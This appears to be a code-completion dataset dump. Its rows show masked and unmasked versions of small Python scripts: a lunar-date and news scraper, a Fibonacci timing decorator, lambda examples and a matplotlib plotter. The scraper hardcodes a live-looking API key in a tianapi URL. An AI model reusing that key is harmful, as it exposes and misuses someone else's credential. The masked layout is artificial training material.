data = scale * np.array(struct.unpack('<%dh' % nframes, data)) / float(1 << 14)
plt.plot(data)
plt.show()
| null | null | null | null | [
0
] |
50 | e1d0648825695584d3ea518db961a9178ea0c66a | <mask token>
def china_lunar():
today = str(date.today())
today_list = today.split('-')
lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(
datetime.datetime.now().month), int(datetime.datetime.now().day))
if lunar_day.Lleap:
china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
else:
china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
return today, china_day
<mask token>
def news_put():
news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1
] + '\n' + morning_news()
return news_spider_message
<mask token>
def NewYork_news(page=1):
society = 'https://cn.nytimes.com/society/{}/'.format(page)
response = requests.get(url=society, headers=headers)
mytree = lxml.etree.HTML(response.text)
title = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a')
news = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//p')
url = mytree.xpath(
'//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a/@href')
newss_1 = ''
number = 1
for t in title:
newss = str(number) + ':' + str_list(t.text
) + '。' + '\n' + ' 概要:' + str_list(news[title.index(t)].text
) + '。' + '\n' + ' 详情:' + '\n' + '\n'
newss_1 += newss
number += 1
return newss_1
def NewYork_news_put(page=0):
news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[
1] + '\n' + NewYork_news(page)
return news_spider_message
def str_list(t):
m = ''
for i in list(t):
if i == '中':
china = 'Z'
m += china + '_'
else:
m += i + '_'
return m
| <mask token>
def china_lunar():
today = str(date.today())
today_list = today.split('-')
lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(
datetime.datetime.now().month), int(datetime.datetime.now().day))
if lunar_day.Lleap:
china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
else:
china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
return today, china_day
<mask token>
def morning_news():
news_api = (
'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'
)
response = requests.get(news_api)
print(dict(response.json()))
news_list = dict(response.json())
news = ''
m = 1
news_q = ''
for i in news_list['newslist']:
img_url = ''
if i['url'] == '':
img_url = i['imgsrc']
news = str(str(m) + ':' + i['title'] + '\n' + i['url'] + img_url + '\n'
)
news_q += str(news)
m += 1
return news_q
def news_put():
news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1
] + '\n' + morning_news()
return news_spider_message
<mask token>
def NewYork_news(page=1):
society = 'https://cn.nytimes.com/society/{}/'.format(page)
response = requests.get(url=society, headers=headers)
mytree = lxml.etree.HTML(response.text)
title = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a')
news = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//p')
url = mytree.xpath(
'//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a/@href')
newss_1 = ''
number = 1
for t in title:
newss = str(number) + ':' + str_list(t.text
) + '。' + '\n' + ' 概要:' + str_list(news[title.index(t)].text
) + '。' + '\n' + ' 详情:' + '\n' + '\n'
newss_1 += newss
number += 1
return newss_1
def NewYork_news_put(page=0):
news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[
1] + '\n' + NewYork_news(page)
return news_spider_message
def str_list(t):
m = ''
for i in list(t):
if i == '中':
china = 'Z'
m += china + '_'
else:
m += i + '_'
return m
| <mask token>
ymc = [u'十一', u'十二', u'正', u'二', u'三', u'四', u'五', u'六', u'七', u'八', u'九', u'十'
]
rmc = [u'初一', u'初二', u'初三', u'初四', u'初五', u'初六', u'初七', u'初八', u'初九', u'初十',
u'十一', u'十二', u'十三', u'十四', u'十五', u'十六', u'十七', u'十八', u'十九', u'二十',
u'廿一', u'廿二', u'廿三', u'廿四', u'廿五', u'廿六', u'廿七', u'廿八', u'廿九', u'三十', u'卅一'
]
lunar = sxtwl.Lunar()
def china_lunar():
today = str(date.today())
today_list = today.split('-')
lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(
datetime.datetime.now().month), int(datetime.datetime.now().day))
if lunar_day.Lleap:
china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
else:
china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
return today, china_day
<mask token>
def morning_news():
news_api = (
'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'
)
response = requests.get(news_api)
print(dict(response.json()))
news_list = dict(response.json())
news = ''
m = 1
news_q = ''
for i in news_list['newslist']:
img_url = ''
if i['url'] == '':
img_url = i['imgsrc']
news = str(str(m) + ':' + i['title'] + '\n' + i['url'] + img_url + '\n'
)
news_q += str(news)
m += 1
return news_q
def news_put():
news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1
] + '\n' + morning_news()
return news_spider_message
headers = {'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'
}
def NewYork_news(page=1):
society = 'https://cn.nytimes.com/society/{}/'.format(page)
response = requests.get(url=society, headers=headers)
mytree = lxml.etree.HTML(response.text)
title = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a')
news = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//p')
url = mytree.xpath(
'//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a/@href')
newss_1 = ''
number = 1
for t in title:
newss = str(number) + ':' + str_list(t.text
) + '。' + '\n' + ' 概要:' + str_list(news[title.index(t)].text
) + '。' + '\n' + ' 详情:' + '\n' + '\n'
newss_1 += newss
number += 1
return newss_1
def NewYork_news_put(page=0):
news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[
1] + '\n' + NewYork_news(page)
return news_spider_message
def str_list(t):
m = ''
for i in list(t):
if i == '中':
china = 'Z'
m += china + '_'
else:
m += i + '_'
return m
| import requests
import sxtwl
import datetime
from datetime import date
import lxml
from lxml import etree
ymc = [u'十一', u'十二', u'正', u'二', u'三', u'四', u'五', u'六', u'七', u'八', u'九', u'十'
]
rmc = [u'初一', u'初二', u'初三', u'初四', u'初五', u'初六', u'初七', u'初八', u'初九', u'初十',
u'十一', u'十二', u'十三', u'十四', u'十五', u'十六', u'十七', u'十八', u'十九', u'二十',
u'廿一', u'廿二', u'廿三', u'廿四', u'廿五', u'廿六', u'廿七', u'廿八', u'廿九', u'三十', u'卅一'
]
lunar = sxtwl.Lunar()
def china_lunar():
today = str(date.today())
today_list = today.split('-')
lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(
datetime.datetime.now().month), int(datetime.datetime.now().day))
if lunar_day.Lleap:
china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
else:
china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
return today, china_day
import json
def morning_news():
news_api = (
'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'
)
response = requests.get(news_api)
print(dict(response.json()))
news_list = dict(response.json())
news = ''
m = 1
news_q = ''
for i in news_list['newslist']:
img_url = ''
if i['url'] == '':
img_url = i['imgsrc']
news = str(str(m) + ':' + i['title'] + '\n' + i['url'] + img_url + '\n'
)
news_q += str(news)
m += 1
return news_q
def news_put():
news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1
] + '\n' + morning_news()
return news_spider_message
headers = {'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'
}
def NewYork_news(page=1):
society = 'https://cn.nytimes.com/society/{}/'.format(page)
response = requests.get(url=society, headers=headers)
mytree = lxml.etree.HTML(response.text)
title = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a')
news = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//p')
url = mytree.xpath(
'//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a/@href')
newss_1 = ''
number = 1
for t in title:
newss = str(number) + ':' + str_list(t.text
) + '。' + '\n' + ' 概要:' + str_list(news[title.index(t)].text
) + '。' + '\n' + ' 详情:' + '\n' + '\n'
newss_1 += newss
number += 1
return newss_1
def NewYork_news_put(page=0):
news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[
1] + '\n' + NewYork_news(page)
return news_spider_message
def str_list(t):
m = ''
for i in list(t):
if i == '中':
china = 'Z'
m += china + '_'
else:
m += i + '_'
return m
| import requests
import sxtwl
import datetime
from datetime import date
import lxml
from lxml import etree
# Chinese index names for the lunar calendar (month and day names)
ymc = [u"十一", u"十二", u"正", u"二", u"三", u"四", u"五", u"六", u"七", u"八", u"九", u"十"]
rmc = [u"初一", u"初二", u"初三", u"初四", u"初五", u"初六", u"初七", u"初八", u"初九", u"初十", \
u"十一", u"十二", u"十三", u"十四", u"十五", u"十六", u"十七", u"十八", u"十九", \
u"二十", u"廿一", u"廿二", u"廿三", u"廿四", u"廿五", u"廿六", u"廿七", u"廿八", u"廿九", u"三十", u"卅一"]
# Instantiate the lunar-calendar library
lunar = sxtwl.Lunar()
# 2. Convert a solar (Gregorian) date to the lunar date
def china_lunar():
today = str(date.today())
today_list = today.split('-') # ['2019', '08', '08']
    lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(datetime.datetime.now().month), int(datetime.datetime.now().day))  # pass in year, month and day
    # Check whether this is a leap lunar month
    if lunar_day.Lleap:
        # Assumption: a leap month is marked with a 闰 prefix; the two branches were otherwise identical
        china_day = "农历:闰{0}月{1}".format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
    else:
        china_day = "农历:{0}月{1}".format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
    return today, china_day
import json
def morning_news():
news_api = 'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'
response = requests.get(news_api)
print(dict(response.json()))
news_list = dict(response.json())
news = ''
m = 1
news_q=''
for i in news_list['newslist']:
img_url=''
if i['url'] == '':
img_url = i['imgsrc']
news = str(str(m)+":"+i['title']+"\n"+i['url']+img_url+"\n")
news_q += str(news)
m += 1
return news_q
def news_put():
news_spider_message = '【早间新闻】 '+china_lunar()[0]+" "+china_lunar()[1]+"\n"+morning_news()
return news_spider_message
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'}
def NewYork_news(page=1):
society = 'https://cn.nytimes.com/society/{}/'.format(page)
response = requests.get(url=society,headers =headers )
mytree = lxml.etree.HTML(response.text)
title = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a')
news = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//p')
url = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a/@href')
    # print(mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div[2]/div/ul//h3/a')[1].text)  # this is the title
    # print(mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div[2]/div/ul//p')[1].text)  # this is the summary
    #
    # print(mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div[2]/div/ul//h3/a/@href')[1])  # this is the link
newss_1 = ''
number = 1
for t in title:
newss = str(number)+":"+str_list(t.text) +'。'+'\n'+' 概要:'+str_list(news[title.index(t)].text)+'。'+'\n'+' 详情:'+'\n'+'\n'
newss_1 +=newss
number += 1
return newss_1
def NewYork_news_put(page=0):
news_spider_message = '【纽约时报中文网】'+china_lunar()[0]+" "+china_lunar()[1]+"\n"+NewYork_news(page)
return news_spider_message
def str_list(t):
m=''
for i in list(t):
if i == '中':
china = 'Z'
m += china +'_'
else:
m += i + '_'
return m
| [
5,
6,
7,
8,
9
] |
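A sketch of the solar-to-lunar lookup on its own, using only the sxtwl calls that appear in the row above (getDayBySolar plus the Lmc, Ldi and Lleap fields); the date matches the inline comment in china_lunar.
import sxtwl
lunar = sxtwl.Lunar()
day = lunar.getDayBySolar(2019, 8, 8)
print(day.Lmc, day.Ldi, day.Lleap)   # lunar month index, day index, leap-month flag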
51 | 2c39660da8fe839c4634cd73ce069acc7b1b29b4 | <mask token>
| <mask token>
@measure_time_of_func
def fib(n):
sequence = [1, 1]
for i in range(2, n, 1):
sequence.append(sequence[i - 1] + sequence[i - 2])
return sequence
| <mask token>
def measure_time_of_func(func):
def wrapper_func(n):
start_time = time.time()
fib_seq = func(n)
end_time = time.time()
return fib_seq, end_time - start_time
return wrapper_func
@measure_time_of_func
def fib(n):
sequence = [1, 1]
for i in range(2, n, 1):
sequence.append(sequence[i - 1] + sequence[i - 2])
return sequence
| import time
def measure_time_of_func(func):
def wrapper_func(n):
start_time = time.time()
fib_seq = func(n)
end_time = time.time()
return fib_seq, end_time - start_time
return wrapper_func
@measure_time_of_func
def fib(n):
sequence = [1, 1]
for i in range(2, n, 1):
sequence.append(sequence[i - 1] + sequence[i - 2])
return sequence
| import time
# Decorator
def measure_time_of_func(func):
def wrapper_func(n):
start_time = time.time()
fib_seq = func(n)
end_time = time.time()
return (fib_seq, end_time - start_time)
return wrapper_func
# Returns a list with first n numbers of fibonacci sequence.
@measure_time_of_func
def fib(n):
sequence = [1, 1]
for i in range(2, n, 1):
sequence.append(sequence[i - 1] + sequence[i - 2])
return sequence
| [
0,
1,
2,
3,
4
] |
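Usage of the timing decorator above: because wrapper_func replaces the raw function, fib returns a (sequence, elapsed_seconds) tuple.
sequence, elapsed = fib(10)
print(sequence)                      # [1, 1, 2, 3, 5, 8, 13, 21, 34, 55]
print('took %.6f s' % elapsed)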
52 | c87e6f8780bf8d9097f200c7f2f0faf55beb480c | <mask token>
def transform_data2(fn, *args):
for arg in args:
print(fn(arg))
<mask token>
| def transform_data(fn):
print(fn(10))
<mask token>
def transform_data2(fn, *args):
for arg in args:
print(fn(arg))
<mask token>
| def transform_data(fn):
print(fn(10))
<mask token>
def transform_data2(fn, *args):
for arg in args:
print(fn(arg))
<mask token>
def transform_data2(fn, *args):
for arg in args:
print('Result: {:^20.2f}'.format(fn(arg)))
<mask token>
| def transform_data(fn):
print(fn(10))
transform_data(lambda data: data / 5)
def transform_data2(fn, *args):
for arg in args:
print(fn(arg))
transform_data2(lambda data: data / 5, 10, 15, 22, 30)
def transform_data2(fn, *args):
for arg in args:
print('Result: {:^20.2f}'.format(fn(arg)))
transform_data2(lambda data: data / 5, 10, 15, 22, 30)
| # 1
def transform_data(fn):
print(fn(10))
# 2
transform_data(lambda data: data / 5)
# 3
def transform_data2(fn, *args):
for arg in args:
print(fn(arg))
transform_data2(lambda data: data / 5, 10, 15, 22, 30)
# 4
def transform_data2(fn, *args):
for arg in args:
print('Result: {:^20.2f}'.format(fn(arg)))
transform_data2(lambda data: data / 5, 10, 15, 22, 30) | [
1,
2,
3,
4,
5
] |
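The same transformation written with the built-in map(), equivalent to transform_data2 above for this lambda.
for result in map(lambda data: data / 5, (10, 15, 22, 30)):
    print('Result: {:^20.2f}'.format(result))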
53 | f4f08015b7638f4d6ea793350d5d19a3485978cd | <mask token>
def get_objectives(data):
"""Get a list of all first chromosomes' objective values."""
objectives = [math.log(population[0]['objective']) for population in data]
return objectives
def get_new_values(values):
"""Record any changes higher. Its size is the same as its argument's."""
new_values = []
new_value = values[0]
for value in values:
if value > new_value:
new_value = value
new_values.append(new_value)
return new_values
def main(values, is_animation=False):
"""Main function to show the plot which could be played with animation."""
def on_clicked(event):
"""Direct the program when a key is pressed."""
if event.key == 'x':
os._exit(0)
if event.key == 's':
now = datetime.now()
current_time = now.strftime('%H-%M-%S')
plot_name = 'Plot' + '-' + current_time
pyplot.title('', loc='left', pad=20)
fig.savefig('%s%s%s' % (CONS['OUTPUT_PHOTO_DIRECTORY'],
plot_name, CONS['PHOTO_TYPE']), transparent=False, dpi=300)
exit(0)
def draw(values):
"""Plot the grid, the line graphs and the titles."""
subplot.yaxis.grid(True, linestyle='dashed')
new_values = get_new_values(values)
subplot.plot(range(len(values)), values)
subplot.plot(range(len(new_values)), new_values, linewidth=2)
pyplot.title('Press X to exit\nPress S to save', loc='left',
fontsize=14, color='#1F76B4', style='italic', pad=20)
pyplot.title(
f"""{'Max objective:':>25}{max(values):>10.2E}
{'Generation:':>25}{values.index(max(values)):>10}"""
, loc='right', fontfamily='Lucida Sans Typewriter', fontsize=12,
color='#FF7E0E', pad=20)
maplot.rcParams['toolbar'] = 'None'
maplot.rcParams['font.family'] = 'Candara'
maplot.rcParams['font.size'] = 12
maplot.rcParams['font.weight'] = 500
fig = pyplot.figure(figsize=(10, 5))
fig.canvas.set_window_title('Prosthetic Foot Design by Genetic Algorithm')
manager = pyplot.get_current_fig_manager()
manager.window.wm_iconbitmap(CONS['ICON_FILE'])
subplot = fig.add_subplot(111, frameon=True)
subplot.spines['right'].set_visible(False)
subplot.spines['left'].set_visible(False)
subplot.spines['top'].set_visible(False)
subplot.yaxis.tick_right()
subplot.tick_params(axis='y', which='major', pad=5)
subplot.tick_params(axis='x', which='major', pad=5)
pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1)
pyplot.connect('key_press_event', on_clicked)
if is_animation:
for index in range(1, len(values) + 1):
subplot.clear()
draw(values[:index])
pyplot.pause(0.0001)
else:
draw(values)
pyplot.show()
<mask token>
| <mask token>
def get_data():
"""Read output file to get data."""
try:
with open(CONS['OUTPUT_FILE'], 'r') as file:
data = json.load(file)[1]
return data
except FileNotFoundError:
print('Data file not found.')
exit()
def get_objectives(data):
"""Get a list of all first chromosomes' objective values."""
objectives = [math.log(population[0]['objective']) for population in data]
return objectives
def get_new_values(values):
"""Record any changes higher. Its size is the same as its argument's."""
new_values = []
new_value = values[0]
for value in values:
if value > new_value:
new_value = value
new_values.append(new_value)
return new_values
def main(values, is_animation=False):
"""Main function to show the plot which could be played with animation."""
def on_clicked(event):
"""Direct the program when a key is pressed."""
if event.key == 'x':
os._exit(0)
if event.key == 's':
now = datetime.now()
current_time = now.strftime('%H-%M-%S')
plot_name = 'Plot' + '-' + current_time
pyplot.title('', loc='left', pad=20)
fig.savefig('%s%s%s' % (CONS['OUTPUT_PHOTO_DIRECTORY'],
plot_name, CONS['PHOTO_TYPE']), transparent=False, dpi=300)
exit(0)
def draw(values):
"""Plot the grid, the line graphs and the titles."""
subplot.yaxis.grid(True, linestyle='dashed')
new_values = get_new_values(values)
subplot.plot(range(len(values)), values)
subplot.plot(range(len(new_values)), new_values, linewidth=2)
pyplot.title('Press X to exit\nPress S to save', loc='left',
fontsize=14, color='#1F76B4', style='italic', pad=20)
pyplot.title(
f"""{'Max objective:':>25}{max(values):>10.2E}
{'Generation:':>25}{values.index(max(values)):>10}"""
, loc='right', fontfamily='Lucida Sans Typewriter', fontsize=12,
color='#FF7E0E', pad=20)
maplot.rcParams['toolbar'] = 'None'
maplot.rcParams['font.family'] = 'Candara'
maplot.rcParams['font.size'] = 12
maplot.rcParams['font.weight'] = 500
fig = pyplot.figure(figsize=(10, 5))
fig.canvas.set_window_title('Prosthetic Foot Design by Genetic Algorithm')
manager = pyplot.get_current_fig_manager()
manager.window.wm_iconbitmap(CONS['ICON_FILE'])
subplot = fig.add_subplot(111, frameon=True)
subplot.spines['right'].set_visible(False)
subplot.spines['left'].set_visible(False)
subplot.spines['top'].set_visible(False)
subplot.yaxis.tick_right()
subplot.tick_params(axis='y', which='major', pad=5)
subplot.tick_params(axis='x', which='major', pad=5)
pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1)
pyplot.connect('key_press_event', on_clicked)
if is_animation:
for index in range(1, len(values) + 1):
subplot.clear()
draw(values[:index])
pyplot.pause(0.0001)
else:
draw(values)
pyplot.show()
<mask token>
| <mask token>
def get_data():
"""Read output file to get data."""
try:
with open(CONS['OUTPUT_FILE'], 'r') as file:
data = json.load(file)[1]
return data
except FileNotFoundError:
print('Data file not found.')
exit()
def get_objectives(data):
"""Get a list of all first chromosomes' objective values."""
objectives = [math.log(population[0]['objective']) for population in data]
return objectives
def get_new_values(values):
"""Record any changes higher. Its size is the same as its argument's."""
new_values = []
new_value = values[0]
for value in values:
if value > new_value:
new_value = value
new_values.append(new_value)
return new_values
def main(values, is_animation=False):
"""Main function to show the plot which could be played with animation."""
def on_clicked(event):
"""Direct the program when a key is pressed."""
if event.key == 'x':
os._exit(0)
if event.key == 's':
now = datetime.now()
current_time = now.strftime('%H-%M-%S')
plot_name = 'Plot' + '-' + current_time
pyplot.title('', loc='left', pad=20)
fig.savefig('%s%s%s' % (CONS['OUTPUT_PHOTO_DIRECTORY'],
plot_name, CONS['PHOTO_TYPE']), transparent=False, dpi=300)
exit(0)
def draw(values):
"""Plot the grid, the line graphs and the titles."""
subplot.yaxis.grid(True, linestyle='dashed')
new_values = get_new_values(values)
subplot.plot(range(len(values)), values)
subplot.plot(range(len(new_values)), new_values, linewidth=2)
pyplot.title('Press X to exit\nPress S to save', loc='left',
fontsize=14, color='#1F76B4', style='italic', pad=20)
pyplot.title(
f"""{'Max objective:':>25}{max(values):>10.2E}
{'Generation:':>25}{values.index(max(values)):>10}"""
, loc='right', fontfamily='Lucida Sans Typewriter', fontsize=12,
color='#FF7E0E', pad=20)
maplot.rcParams['toolbar'] = 'None'
maplot.rcParams['font.family'] = 'Candara'
maplot.rcParams['font.size'] = 12
maplot.rcParams['font.weight'] = 500
fig = pyplot.figure(figsize=(10, 5))
fig.canvas.set_window_title('Prosthetic Foot Design by Genetic Algorithm')
manager = pyplot.get_current_fig_manager()
manager.window.wm_iconbitmap(CONS['ICON_FILE'])
subplot = fig.add_subplot(111, frameon=True)
subplot.spines['right'].set_visible(False)
subplot.spines['left'].set_visible(False)
subplot.spines['top'].set_visible(False)
subplot.yaxis.tick_right()
subplot.tick_params(axis='y', which='major', pad=5)
subplot.tick_params(axis='x', which='major', pad=5)
pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1)
pyplot.connect('key_press_event', on_clicked)
if is_animation:
for index in range(1, len(values) + 1):
subplot.clear()
draw(values[:index])
pyplot.pause(0.0001)
else:
draw(values)
pyplot.show()
if __name__ == '__main__':
__package__ = 'inputprocess'
objectives = get_objectives(get_data())
main(objectives, is_animation=CONS['IS_ANIMATION'])
| <mask token>
import os
import json
import math
import matplotlib as maplot
import matplotlib.pyplot as pyplot
from datetime import datetime
from sub.inputprocess import CONSTANTS as CONS
def get_data():
"""Read output file to get data."""
try:
with open(CONS['OUTPUT_FILE'], 'r') as file:
data = json.load(file)[1]
return data
except FileNotFoundError:
print('Data file not found.')
exit()
def get_objectives(data):
"""Get a list of all first chromosomes' objective values."""
objectives = [math.log(population[0]['objective']) for population in data]
return objectives
def get_new_values(values):
"""Record any changes higher. Its size is the same as its argument's."""
new_values = []
new_value = values[0]
for value in values:
if value > new_value:
new_value = value
new_values.append(new_value)
return new_values
def main(values, is_animation=False):
"""Main function to show the plot which could be played with animation."""
def on_clicked(event):
"""Direct the program when a key is pressed."""
if event.key == 'x':
os._exit(0)
if event.key == 's':
now = datetime.now()
current_time = now.strftime('%H-%M-%S')
plot_name = 'Plot' + '-' + current_time
pyplot.title('', loc='left', pad=20)
fig.savefig('%s%s%s' % (CONS['OUTPUT_PHOTO_DIRECTORY'],
plot_name, CONS['PHOTO_TYPE']), transparent=False, dpi=300)
exit(0)
def draw(values):
"""Plot the grid, the line graphs and the titles."""
subplot.yaxis.grid(True, linestyle='dashed')
new_values = get_new_values(values)
subplot.plot(range(len(values)), values)
subplot.plot(range(len(new_values)), new_values, linewidth=2)
pyplot.title('Press X to exit\nPress S to save', loc='left',
fontsize=14, color='#1F76B4', style='italic', pad=20)
pyplot.title(
f"""{'Max objective:':>25}{max(values):>10.2E}
{'Generation:':>25}{values.index(max(values)):>10}"""
, loc='right', fontfamily='Lucida Sans Typewriter', fontsize=12,
color='#FF7E0E', pad=20)
maplot.rcParams['toolbar'] = 'None'
maplot.rcParams['font.family'] = 'Candara'
maplot.rcParams['font.size'] = 12
maplot.rcParams['font.weight'] = 500
fig = pyplot.figure(figsize=(10, 5))
fig.canvas.set_window_title('Prosthetic Foot Design by Genetic Algorithm')
manager = pyplot.get_current_fig_manager()
manager.window.wm_iconbitmap(CONS['ICON_FILE'])
subplot = fig.add_subplot(111, frameon=True)
subplot.spines['right'].set_visible(False)
subplot.spines['left'].set_visible(False)
subplot.spines['top'].set_visible(False)
subplot.yaxis.tick_right()
subplot.tick_params(axis='y', which='major', pad=5)
subplot.tick_params(axis='x', which='major', pad=5)
pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1)
pyplot.connect('key_press_event', on_clicked)
if is_animation:
for index in range(1, len(values) + 1):
subplot.clear()
draw(values[:index])
pyplot.pause(0.0001)
else:
draw(values)
pyplot.show()
if __name__ == '__main__':
__package__ = 'inputprocess'
objectives = get_objectives(get_data())
main(objectives, is_animation=CONS['IS_ANIMATION'])
| """Plot the output data.
"""
# Standard library
import os
import json
import math
import matplotlib as maplot
import matplotlib.pyplot as pyplot
from datetime import datetime
# User library
from sub.inputprocess import CONSTANTS as CONS
# **json.loads(json_data)
def get_data():
"""Read output file to get data."""
try:
with open(CONS["OUTPUT_FILE"], "r") as file:
data = json.load(file)[1]
return data
except FileNotFoundError:
print("Data file not found.")
exit()
def get_objectives(data):
"""Get a list of all first chromosomes' objective values."""
objectives = [math.log(population[0]["objective"]) for population in data]
# objectives = [population[0]["objective"] for population in data]
return objectives
def get_new_values(values):
"""Record any changes higher. Its size is the same as its argument's."""
new_values = []
new_value = values[0]
for value in values:
if value > new_value:
new_value = value
new_values.append(new_value)
return new_values
def main(values, is_animation=False):
"""Main function to show the plot which could be played with animation."""
def on_clicked(event):
"""Direct the program when a key is pressed."""
if event.key == "x":
# Use this os._exit(0) to close whole window, even when playing
os._exit(0)
if event.key == "s":
# Get time to define image's name
now = datetime.now()
current_time = now.strftime("%H-%M-%S")
plot_name = "Plot" + "-" + current_time
# Remove left title, then save image
pyplot.title("", loc="left", pad=20)
fig.savefig(
"%s%s%s"
% (
CONS["OUTPUT_PHOTO_DIRECTORY"],
plot_name,
CONS["PHOTO_TYPE"],
),
transparent=False,
dpi=300,
)
# Use this exit(0) to prevent exiting when playing the plot
# but allow closing when plotting finishes
exit(0)
def draw(values):
"""Plot the grid, the line graphs and the titles."""
# Turn on grid with dashed style
subplot.yaxis.grid(True, linestyle="dashed")
# Get list of new higher values
new_values = get_new_values(values)
# Plot 2 lines
subplot.plot(range(len(values)), values)
subplot.plot(range(len(new_values)), new_values, linewidth=2)
# Print left plot title
pyplot.title(
"Press X to exit\nPress S to save",
loc="left",
fontsize=14,
color="#1F76B4",
style="italic",
pad=20,
)
# Print right plot title
pyplot.title(
f"{'Max objective:':>25}{max(values):>10.2E}\n"
f"{'Generation:':>25}{values.index(max(values)):>10}",
loc="right",
fontfamily="Lucida Sans Typewriter",
fontsize=12,
color="#FF7E0E",
pad=20,
)
# The following code configures some elements of the plot window
# Disable toolbar
maplot.rcParams["toolbar"] = "None"
# Set font
maplot.rcParams["font.family"] = "Candara"
maplot.rcParams["font.size"] = 12
maplot.rcParams["font.weight"] = 500
# Set window title
fig = pyplot.figure(figsize=(10, 5))
fig.canvas.set_window_title("Prosthetic Foot Design by Genetic Algorithm")
# Set icon
manager = pyplot.get_current_fig_manager()
manager.window.wm_iconbitmap(CONS["ICON_FILE"])
# Disable some borders
subplot = fig.add_subplot(111, frameon=True)
subplot.spines["right"].set_visible(False)
subplot.spines["left"].set_visible(False)
subplot.spines["top"].set_visible(False)
# Push verticle axis to the right
subplot.yaxis.tick_right()
# Padding axis label from plot area, maybe unnecessary
subplot.tick_params(axis="y", which="major", pad=5)
subplot.tick_params(axis="x", which="major", pad=5)
# Adjust subplot size based on window size
pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1)
# Reconize key pressed
pyplot.connect("key_press_event", on_clicked)
if is_animation:
for index in range(1, len(values) + 1):
subplot.clear()
draw(values[:index])
pyplot.pause(0.0001)
else:
draw(values)
# Hold window
pyplot.show()
if __name__ == "__main__":
__package__ = "inputprocess"
objectives = get_objectives(get_data())
main(objectives, is_animation=CONS["IS_ANIMATION"])
| [
3,
4,
5,
6,
7
] |
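A minimal standalone sketch of the key handling used above; fig.canvas.mpl_connect is the canonical API behind pyplot.connect.
import matplotlib.pyplot as plt
def on_key(event):
    if event.key == 'x':
        plt.close('all')             # close every open figure
fig = plt.figure()
fig.canvas.mpl_connect('key_press_event', on_key)
plt.plot([1, 2, 3])
plt.show()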
54 | d2a153fffccd4b681eebce823e641e195197cde7 | <mask token>
| <mask token>
class NamingConvention:
<mask token>
def __init__(self):
namingconventions = os.path.join(os.path.dirname(os.path.dirname(
__file__)), 'data', 'strings', 'namingconvention.json')
namingconventions = json.load(open(namingconventions))
for key, value in namingconventions.items():
setattr(NamingConvention, key, value)
| <mask token>
class NamingConvention:
"""Imports naming conventions from the respective .json file and puts them
into class variables.
"""
def __init__(self):
namingconventions = os.path.join(os.path.dirname(os.path.dirname(
__file__)), 'data', 'strings', 'namingconvention.json')
namingconventions = json.load(open(namingconventions))
for key, value in namingconventions.items():
setattr(NamingConvention, key, value)
| <mask token>
import os
